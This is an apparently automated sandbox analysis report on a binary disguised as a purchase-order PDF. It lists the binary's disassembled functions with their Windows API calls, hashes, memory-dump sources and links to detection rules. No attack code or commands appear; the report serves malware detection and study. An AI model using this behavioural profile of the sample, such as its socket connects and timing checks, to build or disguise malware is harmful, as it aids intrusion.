                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 245547762-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: aaa03f654d2c2080970664bbc2635e6406c59b0d093f7dcd590a1c65d79e0220
                                                                                                                                                                                                                                                                                                            • Instruction ID: b27d5ee258410aac5bd3077dd9c53ce90635b59006b610d0ec7ee295a05cd03d
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aaa03f654d2c2080970664bbc2635e6406c59b0d093f7dcd590a1c65d79e0220
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3211DA712002109BD310FB2AC842F9BB3D8AF85728F04895FF594A72D2D7B9A885875A
                                                                                                                                                                                                                                                                                                            Function 0044710F Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                                                                                                                                                                                                                            • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                                                                                                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                                                                                                                                                                                                                            • BeginPath.GDI32(?), ref: 004471B7
                                                                                                                                                                                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Object$Select$BeginCreateDeletePath
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 2338827641-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: f19e52de08adcd67550c2e9faff4417be3cdd69e9125f029607893bae639c511
                                                                                                                                                                                                                                                                                                            • Instruction ID: ab30216038401830d00444c504d41f25dcbf82a6e2307e0a418987ed8484b610
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f19e52de08adcd67550c2e9faff4417be3cdd69e9125f029607893bae639c511
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7E2171B18083019FD320CF29AD44A1B7FACF74A724F14052FF654933A1EB789849CB69
                                                                                                                                                                                                                                                                                                            Function 0043770A Relevance: 7.6, APIs: 5, Instructions: 56sleepCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000,00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043771E
                                                                                                                                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043773C
                                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043775C
                                                                                                                                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,004448B6,0000000F,?), ref: 00437767
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 2875609808-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 901ea73111326f2a8af3d8a1217edfde6b6dff748f8bb26d3b0ac17b2ce0a9c5
                                                                                                                                                                                                                                                                                                            • Instruction ID: fd8a8a83491f03de43ea78fbc63302b75a2fa5438857304713168bbc83ca9150
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 901ea73111326f2a8af3d8a1217edfde6b6dff748f8bb26d3b0ac17b2ce0a9c5
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EA11A3B64093119BC210EF1ADA88A8FB7F4FFD8765F004D2EF9C462250DB34D5598B9A
                                                                                                                                                                                                                                                                                                            Function 0046FCC6 Relevance: 7.5, APIs: 5, Instructions: 49windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32 ref: 0046FD00
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000104C,00000000,?), ref: 0046FD2E
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001015,?,?), ref: 0046FD4B
                                                                                                                                                                                                                                                                                                            • DestroyIcon.USER32(?), ref: 0046FD58
                                                                                                                                                                                                                                                                                                            • DestroyIcon.USER32(?), ref: 0046FD5F
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: MessageSend$DestroyIcon
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 3419509030-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: a24bc400bf7eaff3d1708451a80103ed5292b50ec6011cebb58ec712c1110a53
                                                                                                                                                                                                                                                                                                            • Instruction ID: ba7c1cc62690e465ab1dcb48fa3e0f79152c3dc78d34179caeeeb49ed344ab69
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a24bc400bf7eaff3d1708451a80103ed5292b50ec6011cebb58ec712c1110a53
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5F1182B15043449BE730DF14DC46BABB7E8FBC5714F00492EE6C857291D6B8A84A8B67
                                                                                                                                                                                                                                                                                                            Function 004175A2 Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • __getptd.LIBCMT ref: 004175AE
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00416C72: __getptd_noexit.LIBCMT ref: 00416C75
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00416C72: __amsg_exit.LIBCMT ref: 00416C82
                                                                                                                                                                                                                                                                                                            • __amsg_exit.LIBCMT ref: 004175CE
                                                                                                                                                                                                                                                                                                            • __lock.LIBCMT ref: 004175DE
                                                                                                                                                                                                                                                                                                            • InterlockedDecrement.KERNEL32(?), ref: 004175FB
                                                                                                                                                                                                                                                                                                            • InterlockedIncrement.KERNEL32(00B72D58), ref: 00417626
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 4271482742-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 9041076209036267701916e3e7e7a5ecd924b858c75713c79b1599e88ef874d9
                                                                                                                                                                                                                                                                                                            • Instruction ID: de548182bd5f57d4f8c9f8a4c79293bfa6802d75d0085d2526eaa3c6a777046b
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9041076209036267701916e3e7e7a5ecd924b858c75713c79b1599e88ef874d9
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9401AD31944A11AFC710ABA998497CE7BB0BB11724F0540ABE80063791CB3CA9C1CFEE
                                                                                                                                                                                                                                                                                                            Function 004555B8 Relevance: 7.5, APIs: 5, Instructions: 45windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                                                                                                                                                                                                            • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Destroy$DeleteObjectWindow$Icon
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 4023252218-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 187bd120907745c88baacffad0920a9106e1cca1ea6db424662e0a83cd01c53e
                                                                                                                                                                                                                                                                                                            • Instruction ID: d1816f9fa450f538fb043821254e2bd2cfb9ade9207d957631f6d0e9d50691b6
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 187bd120907745c88baacffad0920a9106e1cca1ea6db424662e0a83cd01c53e
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 05015E70300605ABCB20DF65D9D4B2B77A8BF14712B50452AFD04D7346EB38EC48CB69
                                                                                                                                                                                                                                                                                                            Function 0046032B Relevance: 7.5, APIs: 5, Instructions: 43windowtimeCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00460342
                                                                                                                                                                                                                                                                                                            • GetWindowTextW.USER32(00000000,00000100,00000100), ref: 00460357
                                                                                                                                                                                                                                                                                                            • MessageBeep.USER32(00000000), ref: 0046036D
                                                                                                                                                                                                                                                                                                            • KillTimer.USER32(?,0000040A), ref: 00460392
                                                                                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000001), ref: 004603AB
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 3741023627-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 5e0545b8da8baa7cb8324f4116d33f6edaa60507eab9176a587cebaf75a8c25b
                                                                                                                                                                                                                                                                                                            • Instruction ID: 48c257e0c270193328064fa19c5b46d6a870d8092b70dfec968bdaebd9a60f08
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5e0545b8da8baa7cb8324f4116d33f6edaa60507eab9176a587cebaf75a8c25b
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BE018831500300A7E7209B54DE5DBDB77A8BF44B05F00492EB681A25D0E7F8A584CB55
                                                                                                                                                                                                                                                                                                            Function 00455505 Relevance: 7.5, APIs: 5, Instructions: 43windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001101,00000000,?), ref: 00455514
                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                                                                                                                                                                                                            • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 1489400265-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: fb8346e1cf28bbdc4ad062342734fe1bacbf25b41774fd01ae6266dc65fad9d1
                                                                                                                                                                                                                                                                                                            • Instruction ID: 68d82c845863845e83b9d92669df32d5d1b96a6c2c0272d07869f65424c05900
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fb8346e1cf28bbdc4ad062342734fe1bacbf25b41774fd01ae6266dc65fad9d1
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D9014F703006419BDB10EF65DED8A2A73A9FB44712B40455AFE05DB286DB78EC49CB68
                                                                                                                                                                                                                                                                                                            Function 0045551F Relevance: 7.5, APIs: 5, Instructions: 42windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0043343D: InvalidateRect.USER32(?,00000000,00000001), ref: 004334BE
                                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                                                                                                                                                                                                            • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 1042038666-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 920ee65d6839c6288c76afce6441748d32e1b72318fe83d584ccefe2da360159
                                                                                                                                                                                                                                                                                                            • Instruction ID: 707d1f3050e1f0ff98422ce5efa9f9a4d3559fdafbc0a23101ed238e91bf2869
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 920ee65d6839c6288c76afce6441748d32e1b72318fe83d584ccefe2da360159
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B2014B702006419BCB10AF65D9C8A2A33ACAF19322780456AFD05D7242DB28EC498B79
                                                                                                                                                                                                                                                                                                            Function 0043315E Relevance: 7.5, APIs: 5, Instructions: 33COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 2625713937-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: a89ec47609df172868659220a46891f09f78d761c189f4b7bb4a315096e7830c
                                                                                                                                                                                                                                                                                                            • Instruction ID: 1b0d13c7bbaa275692c81ef4a4760df4fcf6218f807946f7e03cce85d1463269
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a89ec47609df172868659220a46891f09f78d761c189f4b7bb4a315096e7830c
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F7F0A4751052019BD7508F18EC0C70E7FA8FB4F325F04462EEA19932E0DB781546CBAD
                                                                                                                                                                                                                                                                                                            Function 004140CF Relevance: 7.5, APIs: 5, Instructions: 24threadCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
